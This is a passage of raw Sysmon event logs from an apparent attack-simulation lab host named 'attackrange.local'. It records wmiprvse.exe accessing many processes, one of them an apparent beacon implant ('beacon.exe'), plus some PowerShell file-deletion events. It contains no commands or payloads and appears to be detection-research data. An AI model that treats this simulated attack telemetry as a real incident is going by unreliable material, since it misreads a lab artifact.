ll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.842{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fz0zfkiu.vbc.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hcscdvbc.wiq.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.